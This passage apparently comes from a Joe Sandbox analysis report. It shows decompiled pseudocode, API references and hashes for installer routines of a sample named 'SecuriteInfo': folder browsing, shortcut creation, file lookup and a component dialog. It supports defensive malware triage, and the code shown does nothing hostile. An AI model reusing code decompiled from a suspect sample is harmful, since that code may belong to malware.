                                                                        							_v80 = _t167;
                                                                        							_v72 = 0x423748;
                                                                        							_v60 = E00404E0B;
                                                                        							_v56 = _t146;
                                                                        							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
                                                                        							_t122 =  &_v80;
                                                                        							_v64 = 0x41;
                                                                        							__imp__SHBrowseForFolderW(_t122);
                                                                        							if(_t122 == 0) {
                                                                        								_a8 = 0x40f;
                                                                        							} else {
                                                                        								__imp__CoTaskMemFree(_t122);
                                                                        								E00405F37(_t146);
                                                                        								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
                                                                        								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\engineer\\AppData\\Local\\Temp") {
                                                                        									E004066A5(_t146, 0x423748, _t167, 0, _t125);
                                                                        									if(lstrcmpiW(0x428200, 0x423748) != 0) {
                                                                        										lstrcatW(_t146, 0x428200);
                                                                        									}
                                                                        								}
                                                                        								 *0x423738 =  *0x423738 + 1;
                                                                        								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                                        							}
                                                                        						}
                                                                        						goto L20;
                                                                        					}
                                                                        					if(_a12 >> 0x10 != 0x300) {
                                                                        						goto L53;
                                                                        					}
                                                                        					_a8 = 0x40f;
                                                                        					goto L12;
                                                                        				} else {
                                                                        					_t166 = GetDlgItem(_t167, 0x3fb);
                                                                        					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
                                                                        						E00405F37(_t146);
                                                                        					}
                                                                        					 *0x429238 = _t167;
                                                                        					SetWindowTextW(_t166, _t146);
                                                                        					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                        					_push(1);
                                                                        					E004045C4(_t167);
                                                                        					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                        					_push(0x14);
                                                                        					E004045C4(_t167);
                                                                        					E004045F9(_t166);
                                                                        					_t138 = E00406A35(8);
                                                                        					if(_t138 == 0) {
                                                                        						L53:
                                                                        						return E0040462B(_a8, _a12, _a16);
                                                                        					} else {
                                                                        						 *_t138(_t166, 1);
                                                                        						goto L8;
                                                                        					}
                                                                        				}
                                                                        			}













































                                                                        0x00404ab5
                                                                        0x00404abb
                                                                        0x00404ac1
                                                                        0x00404ace
                                                                        0x00404adc
                                                                        0x00404adf
                                                                        0x00404ae7
                                                                        0x00404aed
                                                                        0x00404aed
                                                                        0x00404af9
                                                                        0x00404afc
                                                                        0x00404b6a
                                                                        0x00404b71
                                                                        0x00404c48
                                                                        0x00404c4f
                                                                        0x00404c5e
                                                                        0x00404c5e
                                                                        0x00404c62
                                                                        0x00404c6c
                                                                        0x00404c79
                                                                        0x00404c7b
                                                                        0x00404c7b
                                                                        0x00404c89
                                                                        0x00404c90
                                                                        0x00404c97
                                                                        0x00404c9a
                                                                        0x00404cd6
                                                                        0x00404cd8
                                                                        0x00404cde
                                                                        0x00404ce3
                                                                        0x00404ce7
                                                                        0x00404ce9
                                                                        0x00404ce9
                                                                        0x00404d05
                                                                        0x00000000
                                                                        0x00404d07
                                                                        0x00404d0a
                                                                        0x00404d18
                                                                        0x00404d1e
                                                                        0x00404d1f
                                                                        0x00404d22
                                                                        0x00404d25
                                                                        0x00000000
                                                                        0x00404d25
                                                                        0x00404c9c
                                                                        0x00404c9e
                                                                        0x00404ca2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00404ca4
                                                                        0x00404ca4
                                                                        0x00404cb1
                                                                        0x00404cb6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00404cba
                                                                        0x00404cbc
                                                                        0x00404cbc
                                                                        0x00404cc5
                                                                        0x00404cc7
                                                                        0x00404ccc
                                                                        0x00404ccf
                                                                        0x00404cd4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00404cd4
                                                                        0x00404d31
                                                                        0x00404d3b
                                                                        0x00404d3e
                                                                        0x00404d41
                                                                        0x00404d48
                                                                        0x00404d48
                                                                        0x00404d4a
                                                                        0x00404d4a
                                                                        0x00404d4f
                                                                        0x00404d51
                                                                        0x00404d59
                                                                        0x00404d60
                                                                        0x00404d62
                                                                        0x00404d6d
                                                                        0x00404d6d
                                                                        0x00404d62
                                                                        0x00404d7d
                                                                        0x00404d87
                                                                        0x00404d8f
                                                                        0x00404daa
                                                                        0x00404d91
                                                                        0x00404d9a
                                                                        0x00404d9a
                                                                        0x00404d8f
                                                                        0x00404daf
                                                                        0x00404db4
                                                                        0x00404db9
                                                                        0x00404dc2
                                                                        0x00404dc2
                                                                        0x00404dcb
                                                                        0x00404dcd
                                                                        0x00404dcd
                                                                        0x00404dd9
                                                                        0x00404de1
                                                                        0x00404deb
                                                                        0x00404deb
                                                                        0x00404df0
                                                                        0x00000000
                                                                        0x00404df0
                                                                        0x00404c9a
                                                                        0x00404c51
                                                                        0x00404c58
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00404c58
                                                                        0x00404b77
                                                                        0x00404b80
                                                                        0x00404b9a
                                                                        0x00404b9f
                                                                        0x00404ba9
                                                                        0x00404bb0
                                                                        0x00404bbc
                                                                        0x00404bbf
                                                                        0x00404bc2
                                                                        0x00404bc9
                                                                        0x00404bd1
                                                                        0x00404bd4
                                                                        0x00404bd8
                                                                        0x00404bdf
                                                                        0x00404be7
                                                                        0x00404c41
                                                                        0x00404be9
                                                                        0x00404bea
                                                                        0x00404bf1
                                                                        0x00404bfb
                                                                        0x00404c03
                                                                        0x00404c10
                                                                        0x00404c24
                                                                        0x00404c28
                                                                        0x00404c28
                                                                        0x00404c24
                                                                        0x00404c2d
                                                                        0x00404c3a
                                                                        0x00404c3a
                                                                        0x00404be7
                                                                        0x00000000
                                                                        0x00404b9f
                                                                        0x00404b8d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00404b93
                                                                        0x00000000
                                                                        0x00404afe
                                                                        0x00404b0b
                                                                        0x00404b14
                                                                        0x00404b21
                                                                        0x00404b21
                                                                        0x00404b28
                                                                        0x00404b2e
                                                                        0x00404b37
                                                                        0x00404b3a
                                                                        0x00404b3d
                                                                        0x00404b45
                                                                        0x00404b48
                                                                        0x00404b4b
                                                                        0x00404b51
                                                                        0x00404b58
                                                                        0x00404b5f
                                                                        0x00404df6
                                                                        0x00404e08
                                                                        0x00404b65
                                                                        0x00404b68
                                                                        0x00000000
                                                                        0x00404b68
                                                                        0x00404b5f

                                                                        APIs
                                                                        • GetDlgItem.USER32 ref: 00404B04
                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                                        • lstrcmpiW.KERNEL32(Call,00423748,00000000,?,?), ref: 00404C1C
                                                                        • lstrcatW.KERNEL32(?,Call), ref: 00404C28
                                                                        • SetDlgItemTextW.USER32 ref: 00404C3A
                                                                          • Part of subcall function 00405CAC: GetDlgItemTextW.USER32 ref: 00405CBF
                                                                          • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                          • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                          • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                          • Part of subcall function 004068EF: CharPrevW.USER32(?,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                        • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                                                          • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                          • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                                          • Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                        • String ID: A$C:\Users\user\AppData\Local\Temp$Call$H7B
                                                                        • API String ID: 2624150263-3225898076
                                                                        • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                                        • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                                                        • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                                        • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 67%
                                                                        			E004021AA(void* __eflags) {
                                                                        				signed int _t52;
                                                                        				void* _t56;
                                                                        				intOrPtr* _t60;
                                                                        				intOrPtr _t61;
                                                                        				intOrPtr* _t62;
                                                                        				intOrPtr* _t64;
                                                                        				intOrPtr* _t66;
                                                                        				intOrPtr* _t68;
                                                                        				intOrPtr* _t70;
                                                                        				intOrPtr* _t72;
                                                                        				intOrPtr* _t74;
                                                                        				intOrPtr* _t76;
                                                                        				intOrPtr* _t78;
                                                                        				intOrPtr* _t80;
                                                                        				void* _t83;
                                                                        				intOrPtr* _t91;
                                                                        				signed int _t101;
                                                                        				signed int _t105;
                                                                        				void* _t107;
                                                                        
                                                                        				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                                                        				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                                                        				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                                                        				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                                                        				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                                                        				_t52 =  *(_t107 - 0x20);
                                                                        				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                                                        				_t101 = _t52 & 0x00008000;
                                                                        				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                                        				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                                        				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                                                        					E00402DA6(0x21);
                                                                        				}
                                                                        				_t56 = _t107 + 8;
                                                                        				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
                                                                        				if(_t56 < _t83) {
                                                                        					L14:
                                                                        					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                                        					_push(0xfffffff0);
                                                                        				} else {
                                                                        					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                                        					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
                                                                        					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                                                        					if(_t61 >= _t83) {
                                                                        						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                                        						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                                                        						if(_t101 == _t83) {
                                                                        							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                                        							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\engineer\\AppData\\Local\\Temp");
                                                                        						}
                                                                        						if(_t105 != _t83) {
                                                                        							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                                        							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                                        						}
                                                                        						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                                        						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                                        						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                                                        						if( *_t91 != _t83) {
                                                                        							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                                        							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                                                        						}
                                                                        						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                                        						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                                        						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                                        						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                                        						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                        							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                                                        							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                                                        						}
                                                                        						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                                                        						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                        					}
                                                                        					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                                        					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                                        					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                        						_push(0xfffffff4);
                                                                        					} else {
                                                                        						goto L14;
                                                                        					}
                                                                        				}
                                                                        				E00401423();
                                                                        				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
                                                                        				return 0;
                                                                        			}






















                                                                        0x004021b3
                                                                        0x004021bd
                                                                        0x004021c7
                                                                        0x004021d1
                                                                        0x004021dc
                                                                        0x004021df
                                                                        0x004021f9
                                                                        0x004021fc
                                                                        0x00402202
                                                                        0x00402205
                                                                        0x0040220f
                                                                        0x00402213
                                                                        0x00402213
                                                                        0x00402218
                                                                        0x00402229
                                                                        0x00402231
                                                                        0x004022e8
                                                                        0x004022e8
                                                                        0x004022ef
                                                                        0x00402237
                                                                        0x00402237
                                                                        0x00402246
                                                                        0x0040224a
                                                                        0x0040224d
                                                                        0x00402253
                                                                        0x00402261
                                                                        0x00402264
                                                                        0x00402266
                                                                        0x00402271
                                                                        0x00402271
                                                                        0x00402276
                                                                        0x00402278
                                                                        0x0040227f
                                                                        0x0040227f
                                                                        0x00402282
                                                                        0x0040228b
                                                                        0x0040228e
                                                                        0x00402294
                                                                        0x00402296
                                                                        0x004022a0
                                                                        0x004022a0
                                                                        0x004022a3
                                                                        0x004022ac
                                                                        0x004022af
                                                                        0x004022b8
                                                                        0x004022be
                                                                        0x004022c0
                                                                        0x004022ce
                                                                        0x004022ce
                                                                        0x004022d1
                                                                        0x004022d7
                                                                        0x004022d7
                                                                        0x004022da
                                                                        0x004022e0
                                                                        0x004022e6
                                                                        0x004022fb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004022e6
                                                                        0x004022f1
                                                                        0x00402c2d
                                                                        0x00402c39

                                                                        APIs
                                                                        • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CreateInstance
                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                        • API String ID: 542301482-1104044542
                                                                        • Opcode ID: bf3cff04906a8fef3a301f9eed657051bf574afb9f0f1a3cc87761232435f051
                                                                        • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                                                        • Opcode Fuzzy Hash: bf3cff04906a8fef3a301f9eed657051bf574afb9f0f1a3cc87761232435f051
                                                                        • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 39%
                                                                        			E0040290B(short __ebx, short* __edi) {
                                                                        				void* _t21;
                                                                        
                                                                        				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                                                                        					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                                        					_push(_t21 - 0x2b0);
                                                                        					_push(__edi);
                                                                        					E00406668();
                                                                        				} else {
                                                                        					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                                        					 *__edi = __ebx;
                                                                        					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                                        				}
                                                                        				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
                                                                        				return 0;
                                                                        			}




                                                                        0x00402923
                                                                        0x0040293e
                                                                        0x00402949
                                                                        0x0040294a
                                                                        0x00402a94
                                                                        0x00402925
                                                                        0x00402928
                                                                        0x0040292b
                                                                        0x0040292e
                                                                        0x0040292e
                                                                        0x00402c2d
                                                                        0x00402c39

                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: FileFindFirst
                                                                        • String ID:
                                                                        • API String ID: 1974802433-0
                                                                        • Opcode ID: 1358fc4729cd4e161e3f995057c9de5906a44dd4f8dff08d490623953bdc3ea8
                                                                        • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                                                                        • Opcode Fuzzy Hash: 1358fc4729cd4e161e3f995057c9de5906a44dd4f8dff08d490623953bdc3ea8
                                                                        • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 96%
                                                                        			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                        				struct HWND__* _v8;
                                                                        				struct HWND__* _v12;
                                                                        				long _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				intOrPtr _v28;
                                                                        				signed char* _v32;
                                                                        				int _v36;
                                                                        				signed int _v44;
                                                                        				int _v48;
                                                                        				signed int* _v60;
                                                                        				signed char* _v64;
                                                                        				signed int _v68;
                                                                        				long _v72;
                                                                        				void* _v76;
                                                                        				intOrPtr _v80;
                                                                        				intOrPtr _v84;
                                                                        				void* _v88;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t198;
                                                                        				intOrPtr _t201;
                                                                        				long _t207;
                                                                        				signed int _t211;
                                                                        				signed int _t222;
                                                                        				void* _t225;
                                                                        				void* _t226;
                                                                        				int _t232;
                                                                        				long _t237;
                                                                        				long _t238;
                                                                        				signed int _t239;
                                                                        				signed int _t245;
                                                                        				signed int _t247;
                                                                        				signed char _t248;
                                                                        				signed char _t254;
                                                                        				void* _t258;
                                                                        				void* _t260;
                                                                        				signed char* _t278;
                                                                        				signed char _t279;
                                                                        				long _t284;
                                                                        				struct HWND__* _t291;
                                                                        				signed int* _t292;
                                                                        				int _t293;
                                                                        				long _t294;
                                                                        				signed int _t295;
                                                                        				void* _t297;
                                                                        				long _t298;
                                                                        				int _t299;
                                                                        				signed int _t300;
                                                                        				signed int _t303;
                                                                        				signed int _t311;
                                                                        				signed char* _t319;
                                                                        				int _t324;
                                                                        				void* _t326;
                                                                        
                                                                        				_t291 = _a4;
                                                                        				_v12 = GetDlgItem(_t291, 0x3f9);
                                                                        				_v8 = GetDlgItem(_t291, 0x408);
                                                                        				_t326 = SendMessageW;
                                                                        				_v24 =  *0x42a288;
                                                                        				_v28 =  *0x42a270 + 0x94;
                                                                        				if(_a8 != 0x110) {
                                                                        					L23:
                                                                        					if(_a8 != 0x405) {
                                                                        						_t301 = _a16;
                                                                        					} else {
                                                                        						_a12 = 0;
                                                                        						_t301 = 1;
                                                                        						_a8 = 0x40f;
                                                                        						_a16 = 1;
                                                                        					}
                                                                        					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                        						_v16 = _t301;
                                                                        						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                                                        							if(( *0x42a279 & 0x00000002) != 0) {
                                                                        								L41:
                                                                        								if(_v16 != 0) {
                                                                        									_t237 = _v16;
                                                                        									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                                                        										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                                                        									}
                                                                        									_t238 = _v16;
                                                                        									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                                                        										_t301 = _v24;
                                                                        										_t239 =  *(_t238 + 0x5c);
                                                                        										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                                                        											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                                                        										} else {
                                                                        											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								goto L48;
                                                                        							}
                                                                        							if(_a8 == 0x413) {
                                                                        								L33:
                                                                        								_t301 = 0 | _a8 != 0x00000413;
                                                                        								_t245 = E00404F7F(_v8, _a8 != 0x413);
                                                                        								_t295 = _t245;
                                                                        								if(_t295 >= 0) {
                                                                        									_t94 = _v24 + 8; // 0x8
                                                                        									_t301 = _t245 * 0x818 + _t94;
                                                                        									_t247 =  *_t301;
                                                                        									if((_t247 & 0x00000010) == 0) {
                                                                        										if((_t247 & 0x00000040) == 0) {
                                                                        											_t248 = _t247 ^ 0x00000001;
                                                                        										} else {
                                                                        											_t254 = _t247 ^ 0x00000080;
                                                                        											if(_t254 >= 0) {
                                                                        												_t248 = _t254 & 0x000000fe;
                                                                        											} else {
                                                                        												_t248 = _t254 | 0x00000001;
                                                                        											}
                                                                        										}
                                                                        										 *_t301 = _t248;
                                                                        										E0040117D(_t295);
                                                                        										_a12 = _t295 + 1;
                                                                        										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
                                                                        										_a8 = 0x40f;
                                                                        									}
                                                                        								}
                                                                        								goto L41;
                                                                        							}
                                                                        							_t301 = _a16;
                                                                        							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                        								goto L41;
                                                                        							}
                                                                        							goto L33;
                                                                        						} else {
                                                                        							goto L48;
                                                                        						}
                                                                        					} else {
                                                                        						L48:
                                                                        						if(_a8 != 0x111) {
                                                                        							L56:
                                                                        							if(_a8 == 0x200) {
                                                                        								SendMessageW(_v8, 0x200, 0, 0);
                                                                        							}
                                                                        							if(_a8 == 0x40b) {
                                                                        								_t225 =  *0x42372c;
                                                                        								if(_t225 != 0) {
                                                                        									ImageList_Destroy(_t225);
                                                                        								}
                                                                        								_t226 =  *0x423740;
                                                                        								if(_t226 != 0) {
                                                                        									GlobalFree(_t226);
                                                                        								}
                                                                        								 *0x42372c = 0;
                                                                        								 *0x423740 = 0;
                                                                        								 *0x42a2c0 = 0;
                                                                        							}
                                                                        							if(_a8 != 0x40f) {
                                                                        								L90:
                                                                        								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
                                                                        									_t324 = (0 | _a16 == 0x00000020) << 3;
                                                                        									ShowWindow(_v8, _t324);
                                                                        									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                                                        								}
                                                                        								goto L93;
                                                                        							} else {
                                                                        								E004011EF(_t301, 0, 0);
                                                                        								_t198 = _a12;
                                                                        								if(_t198 != 0) {
                                                                        									if(_t198 != 0xffffffff) {
                                                                        										_t198 = _t198 - 1;
                                                                        									}
                                                                        									_push(_t198);
                                                                        									_push(8);
                                                                        									E00404FFF();
                                                                        								}
                                                                        								if(_a16 == 0) {
                                                                        									L75:
                                                                        									E004011EF(_t301, 0, 0);
                                                                        									_v36 =  *0x423740;
                                                                        									_t201 =  *0x42a288;
                                                                        									_v64 = 0xf030;
                                                                        									_v24 = 0;
                                                                        									if( *0x42a28c <= 0) {
                                                                        										L86:
                                                                        										if( *0x42a31e == 0x400) {
                                                                        											InvalidateRect(_v8, 0, 1);
                                                                        										}
                                                                        										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
                                                                        											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
                                                                        										}
                                                                        										goto L90;
                                                                        									}
                                                                        									_t292 = _t201 + 8;
                                                                        									do {
                                                                        										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                                        										if(_t207 != 0) {
                                                                        											_t303 =  *_t292;
                                                                        											_v72 = _t207;
                                                                        											_v76 = 8;
                                                                        											if((_t303 & 0x00000001) != 0) {
                                                                        												_v76 = 9;
                                                                        												_v60 =  &(_t292[4]);
                                                                        												_t292[0] = _t292[0] & 0x000000fe;
                                                                        											}
                                                                        											if((_t303 & 0x00000040) == 0) {
                                                                        												_t211 = (_t303 & 0x00000001) + 1;
                                                                        												if((_t303 & 0x00000010) != 0) {
                                                                        													_t211 = _t211 + 3;
                                                                        												}
                                                                        											} else {
                                                                        												_t211 = 3;
                                                                        											}
                                                                        											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                                                        											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                                        											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                                                        										}
                                                                        										_v24 = _v24 + 1;
                                                                        										_t292 =  &(_t292[0x206]);
                                                                        									} while (_v24 <  *0x42a28c);
                                                                        									goto L86;
                                                                        								} else {
                                                                        									_t293 = E004012E2( *0x423740);
                                                                        									E00401299(_t293);
                                                                        									_t222 = 0;
                                                                        									_t301 = 0;
